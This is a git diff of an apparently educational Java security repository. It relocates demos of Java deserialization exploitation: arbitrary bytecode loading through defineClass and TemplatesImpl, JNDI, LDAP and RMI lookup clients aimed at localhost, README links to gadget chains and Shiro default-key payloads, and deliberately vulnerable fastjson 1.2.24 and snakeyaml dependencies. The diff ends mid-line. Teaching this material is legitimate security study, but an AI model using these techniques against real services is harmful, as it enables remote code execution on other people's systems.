diff --git a/README.md b/README.md index dbfc6f7..870ec80 100644 --- a/README.md +++ b/README.md @@ -22,26 +22,29 @@ - [Java安全漫谈 - 15.TemplatesImpl在Shiro中的利用](https://t.zsxq.com/JAUBmMz) - [Java安全漫谈 - 16.commons-collections4与漏洞修复](https://t.zsxq.com/ZBQj2FE) - [Java安全漫谈 - 17.CommonsBeanutils与无commons-collections的Shiro反序列化利用](https://t.zsxq.com/IqBmuF6) +- [Java安全漫谈 - 18.原生反序列化利用链JDK7u21](https://t.zsxq.com/neMbuJa) +- [Java安全漫谈 - 19.Java反序列化协议构造与分析](https://t.zsxq.com/ZfiEeEY) ## Demo代码 字节码: -- 远程字节码加载Demo:[HelloClassLoader](general/src/main/java/com/govuln/bytes/HelloClassLoader.java) -- 系统默认defineClass加载字节码Demo:[HelloDefineClass](general/src/main/java/com/govuln/bytes/HelloDefineClass.java) -- 使用TemplatesImpl加载字节码Demo:[HelloTemplatesImpl](general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java) -- 使用BCEL加载字节码Demo:[HelloBCEL](general/src/main/java/com/govuln/bytes/HelloBCEL.java) +- 远程字节码加载Demo:[HelloClassLoader](jdk8/src/main/java/com/govuln/bytes/HelloClassLoader.java) +- 系统默认defineClass加载字节码Demo:[HelloDefineClass](jdk8/src/main/java/com/govuln/bytes/HelloDefineClass.java) +- 使用TemplatesImpl加载字节码Demo:[HelloTemplatesImpl](jdk8/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java) +- 使用BCEL加载字节码Demo:[HelloBCEL](jdk8/src/main/java/com/govuln/bytes/HelloBCEL.java) 反序列化: -- 最简单的Transformer Demo:[CommonsCollectionsIntro.java](general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java) -- 我简化的[CommonsCollections6](general/src/main/java/com/govuln/deserialization/CommonsCollections6.java),更方便大家理解 -- 利用TemplatesImpl构造的Transformer Demo:[CommonsCollectionsIntro2.java](general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java) -- 无InvokerTransformer的Transformer Demo:[CommonsCollectionsIntro3.java](general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java) -- 我简化的[CommonsCollections3](general/src/main/java/com/govuln/deserialization/CommonsCollections3.java) -- CommonsCollections6一次执行多个命令:[CommonsCollections6Multiple](general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java) -- 支持commons-collections4.0版本的CommonsCollections6利用链:[CommonsCollections6For4](general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java) -- 我简化的CommonsBeanutils1利用链:[CommonsBeanutils1](https://github.com/phith0n/JavaThings/blob/master/general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java) +- 最简单的Transformer Demo:[CommonsCollectionsIntro.java](jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java) +- 我简化的[CommonsCollections6](jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6.java),更方便大家理解 +- 利用TemplatesImpl构造的Transformer Demo:[CommonsCollectionsIntro2.java](jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java) +- 无InvokerTransformer的Transformer Demo:[CommonsCollectionsIntro3.java](jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java) +- 我简化的[CommonsCollections3](jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3.java) +- CommonsCollections6一次执行多个命令:[CommonsCollections6Multiple](jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java) +- 支持commons-collections4.0版本的CommonsCollections6利用链:[CommonsCollections6For4](jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java) +- 我简化的CommonsBeanutils1利用链:[CommonsBeanutils1](jdk8/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java) +- 简化版Java原生利用链 [JDK7u21](jdk8/src/main/java/com/govuln/deserialization/JDK7u21.java) Shiro反序列化: @@ -49,3 +52,8 @@ Shiro反序列化: - 使用CommonsCollections6与Shiro默认Key构造Payload:[Client0.java](shiroattack/src/main/java/com/govuln/shiroattack/Client0.java)、[CommonsCollections6.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java),在Tomcat中可能会无法成功反序列化 - 使用CommonsCollections、TemplatesImpl与Shiro默认Key构造Payload:[Client.java](shiroattack/src/main/java/com/govuln/shiroattack/Client.java)、[CommonsCollectionsShiro.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollectionsShiro.java),解决上述问题 - 使用Shiro默认自带的commons-beanutils构造的反序列化利用链:[CommonsBeanutils1Shiro.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java) + +自研反序列化分析工具: + +- zkar: +- 如何使用zkar修复SerialVersionUID不匹配的问题: diff --git a/general/src/main/java/com/govuln/bytes/HelloDefineClass.java b/general/src/main/java/com/govuln/bytes/HelloDefineClass.java deleted file mode 100644 index 9ae4bb9..0000000 --- a/general/src/main/java/com/govuln/bytes/HelloDefineClass.java +++ /dev/null @@ -1,16 +0,0 @@ -package com.govuln.bytes; - -import java.lang.reflect.Method; -import java.util.Base64; - -public class HelloDefineClass { - public static void main(String[] args) throws Exception { - Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class); - defineClass.setAccessible(true); - - // source: bytecodes/Hello.java - byte[] code = Base64.getDecoder().decode("yv66vgAAADQAHAoABgAOCQAPABAIABEKABIAEwcAFAcAFQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAAg8Y2xpbml0PgEAClNvdXJjZUZpbGUBAApIZWxsby5qYXZhDAAHAAgHABYMABcAGAEAC0hlbGxvIFdvcmxkBwAZDAAaABsBAAVIZWxsbwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3lzdGVtAQADb3V0AQAVTGphdmEvaW8vUHJpbnRTdHJlYW07AQATamF2YS9pby9QcmludFN0cmVhbQEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYAIQAFAAYAAAAAAAIAAQAHAAgAAQAJAAAAHQABAAEAAAAFKrcAAbEAAAABAAoAAAAGAAEAAAACAAgACwAIAAEACQAAACUAAgAAAAAACbIAAhIDtgAEsQAAAAEACgAAAAoAAgAAAAQACAAFAAEADAAAAAIADQ=="); - Class hello = (Class)defineClass.invoke(ClassLoader.getSystemClassLoader(), "Hello", code, 0, code.length); - hello.newInstance(); - } -} diff --git a/general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java b/general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java deleted file mode 100644 index 598788e..0000000 --- a/general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java +++ /dev/null @@ -1,26 +0,0 @@ -package com.govuln.bytes; - -import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; -import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; - -import java.lang.reflect.Field; -import java.util.Base64; - -public class HelloTemplatesImpl { - public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { - Field field = obj.getClass().getDeclaredField(fieldName); - field.setAccessible(true); - field.set(obj, value); - } - - public static void main(String[] args) throws Exception { - // source: bytecodes/HelloTemplateImpl.java - byte[] code = Base64.getDecoder().decode("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); - TemplatesImpl obj = new TemplatesImpl(); - setFieldValue(obj, "_bytecodes", new byte[][] {code}); - setFieldValue(obj, "_name", "HelloTemplatesImpl"); - setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); - - obj.newTransformer(); - } -} diff --git a/general/bytecodes/Foo.java b/jdk8/bytecodes/Foo.java similarity index 100% rename from general/bytecodes/Foo.java rename to jdk8/bytecodes/Foo.java diff --git a/general/bytecodes/Hello.java b/jdk8/bytecodes/Hello.java similarity index 100% rename from general/bytecodes/Hello.java rename to jdk8/bytecodes/Hello.java diff --git a/general/bytecodes/HelloTemplatesImpl.java b/jdk8/bytecodes/HelloTemplatesImpl.java similarity index 100% rename from general/bytecodes/HelloTemplatesImpl.java rename to jdk8/bytecodes/HelloTemplatesImpl.java diff --git a/general/pom.xml b/jdk8/pom.xml similarity index 65% rename from general/pom.xml rename to jdk8/pom.xml index 8ad9f54..fb1091e 100644 --- a/general/pom.xml +++ b/jdk8/pom.xml @@ -14,8 +14,8 @@ UTF-8 - 1.8 - 1.8 + 8 + 8 @@ -42,6 +42,47 @@ javassist 3.12.1.GA + + + commons-codec + commons-codec + 1.15 + + + + commons-io + commons-io + 2.10.0 + + + + + org.springframework.boot + spring-boot-starter-web + 2.7.18 + + + + + org.yaml + snakeyaml + 1.33 + + + + + com.alibaba + fastjson + 1.2.24 + + + + + org.apache.bcel + bcel + 6.10.0 + + @@ -89,15 +130,15 @@ - - - org.apache.maven.plugins - maven-compiler-plugin - - 8 - 8 - - - + + + org.apache.maven.plugins + maven-compiler-plugin + + 8 + 8 + + + diff --git a/general/src/main/java/com/govuln/beans/Cat.java b/jdk8/src/main/java/com/govuln/beans/Cat.java similarity index 100% rename from general/src/main/java/com/govuln/beans/Cat.java rename to jdk8/src/main/java/com/govuln/beans/Cat.java diff --git a/general/src/main/java/com/govuln/bytes/HelloBCEL.java b/jdk8/src/main/java/com/govuln/bytes/HelloBCEL.java similarity index 100% rename from general/src/main/java/com/govuln/bytes/HelloBCEL.java rename to jdk8/src/main/java/com/govuln/bytes/HelloBCEL.java diff --git a/general/src/main/java/com/govuln/bytes/HelloClassLoader.java b/jdk8/src/main/java/com/govuln/bytes/HelloClassLoader.java similarity index 100% rename from general/src/main/java/com/govuln/bytes/HelloClassLoader.java rename to jdk8/src/main/java/com/govuln/bytes/HelloClassLoader.java diff --git a/jdk8/src/main/java/com/govuln/bytes/HelloDefineClass.java b/jdk8/src/main/java/com/govuln/bytes/HelloDefineClass.java new file mode 100644 index 0000000..93c46ac --- /dev/null +++ b/jdk8/src/main/java/com/govuln/bytes/HelloDefineClass.java @@ -0,0 +1,17 @@ +package com.govuln.bytes; + +import org.apache.commons.codec.binary.Base64; + +import java.lang.reflect.Method; + +public class HelloDefineClass { + public static void main(String[] args) throws Exception { + Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class); + defineClass.setAccessible(true); + + // source: bytecodes/Hello.java + byte[] code = Base64.decodeBase64("yv66vgAAADQAHAoABgAOCQAPABAIABEKABIAEwcAFAcAFQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAAg8Y2xpbml0PgEAClNvdXJjZUZpbGUBAApIZWxsby5qYXZhDAAHAAgHABYMABcAGAEAC0hlbGxvIFdvcmxkBwAZDAAaABsBAAVIZWxsbwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3lzdGVtAQADb3V0AQAVTGphdmEvaW8vUHJpbnRTdHJlYW07AQATamF2YS9pby9QcmludFN0cmVhbQEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYAIQAFAAYAAAAAAAIAAQAHAAgAAQAJAAAAHQABAAEAAAAFKrcAAbEAAAABAAoAAAAGAAEAAAACAAgACwAIAAEACQAAACUAAgAAAAAACbIAAhIDtgAEsQAAAAEACgAAAAoAAgAAAAQACAAFAAEADAAAAAIADQ=="); + Class hello = (Class)defineClass.invoke(ClassLoader.getSystemClassLoader(), "Hello", code, 0, code.length); + hello.newInstance(); + } +} diff --git a/jdk8/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java b/jdk8/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java new file mode 100644 index 0000000..c8fae6f --- /dev/null +++ b/jdk8/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java @@ -0,0 +1,26 @@ +package com.govuln.bytes; + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import org.apache.commons.codec.binary.Base64; + +import java.lang.reflect.Field; + +public class HelloTemplatesImpl { + public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { + Field field = obj.getClass().getDeclaredField(fieldName); + field.setAccessible(true); + field.set(obj, value); + } + + public static void main(String[] args) throws Exception { + // source: bytecodes/HelloTemplateImpl.java + byte[] code = Base64.decodeBase64("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); + TemplatesImpl obj = new TemplatesImpl(); + setFieldValue(obj, "_bytecodes", new byte[][] {code}); + setFieldValue(obj, "_name", "HelloTemplatesImpl"); + setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); + + obj.newTransformer(); + } +} diff --git a/jdk8/src/main/java/com/govuln/client/JNDIClient.java b/jdk8/src/main/java/com/govuln/client/JNDIClient.java new file mode 100644 index 0000000..f045cb4 --- /dev/null +++ b/jdk8/src/main/java/com/govuln/client/JNDIClient.java @@ -0,0 +1,14 @@ +package com.govuln.client; + +import javax.naming.Context; +import javax.naming.InitialContext; +import javax.naming.directory.InitialDirContext; +import javax.naming.ldap.InitialLdapContext; +import java.util.Hashtable; + +public class JNDIClient { + public static void main(String[] args) throws Exception { + Context initialContext = new InitialContext(); + initialContext.lookup("ldap://127.0.0.1:389/sample"); + } +} diff --git a/jdk8/src/main/java/com/govuln/client/LDAPClient.java b/jdk8/src/main/java/com/govuln/client/LDAPClient.java new file mode 100644 index 0000000..8f68ba1 --- /dev/null +++ b/jdk8/src/main/java/com/govuln/client/LDAPClient.java @@ -0,0 +1,21 @@ +package com.govuln.client; + +import javax.naming.Context; +import javax.naming.InitialContext; +import javax.naming.NamingException; +import javax.naming.directory.InitialDirContext; +import java.util.Hashtable; + +public class LDAPClient { + public static void main(String[] args) throws NamingException { + Hashtable env = new Hashtable<>(); + env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory"); + env.put(Context.SECURITY_AUTHENTICATION, "simple"); + env.put(Context.SECURITY_PRINCIPAL, "user"); + env.put(Context.SECURITY_CREDENTIALS, "password"); + env.put(Context.PROVIDER_URL, "ldap://127.0.0.1:389"); + InitialContext ctx = new InitialDirContext(env); + ctx.lookup("sample"); + ctx.close(); + } +} diff --git a/jdk8/src/main/java/com/govuln/client/RMIClient.java b/jdk8/src/main/java/com/govuln/client/RMIClient.java new file mode 100644 index 0000000..00c6ef2 --- /dev/null +++ b/jdk8/src/main/java/com/govuln/client/RMIClient.java @@ -0,0 +1,9 @@ +package com.govuln.client; + +import java.rmi.Naming; + +public class RMIClient { + public static void main(String[] args) throws Exception { + Naming.lookup("rmi://localhost:1099/test"); + } +} diff --git a/general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections1.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections1.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections1.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections1.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections2.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections2.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections2.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections2.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3.java similarity index 99% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections3.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3.java index 521ce73..d8cce44 100644 --- a/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java +++ b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3.java @@ -20,7 +20,6 @@ import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.lang.reflect.InvocationHandler; -import java.util.Base64; import java.util.HashMap; import java.util.Map; diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections6.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections6.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java similarity index 55% rename from general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java index d50a6ed..1ed70dd 100644 --- a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java +++ b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java @@ -2,6 +2,7 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import org.apache.commons.codec.binary.Base64; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; @@ -9,7 +10,6 @@ import org.apache.commons.collections.Transformer; import java.lang.reflect.Field; -import java.util.Base64; import java.util.HashMap; import java.util.Map; @@ -22,7 +22,7 @@ public static void setFieldValue(Object obj, String fieldName, Object value) thr public static void main(String[] args) throws Exception { // source: bytecodes/HelloTemplateImpl.java - byte[] code = Base64.getDecoder().decode("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); + byte[] code = Base64.decodeBase64("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); TemplatesImpl obj = new TemplatesImpl(); setFieldValue(obj, "_bytecodes", new byte[][] {code}); setFieldValue(obj, "_name", "HelloTemplatesImpl"); diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java similarity index 58% rename from general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java index 0694a86..c7b8427 100644 --- a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java +++ b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java @@ -3,6 +3,7 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import org.apache.commons.codec.binary.Base64; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InstantiateTransformer; @@ -11,7 +12,6 @@ import javax.xml.transform.Templates; import java.lang.reflect.Field; -import java.util.Base64; import java.util.HashMap; import java.util.Map; @@ -24,7 +24,7 @@ public static void setFieldValue(Object obj, String fieldName, Object value) thr public static void main(String[] args) throws Exception { // source: bytecodes/HelloTemplateImpl.java - byte[] code = 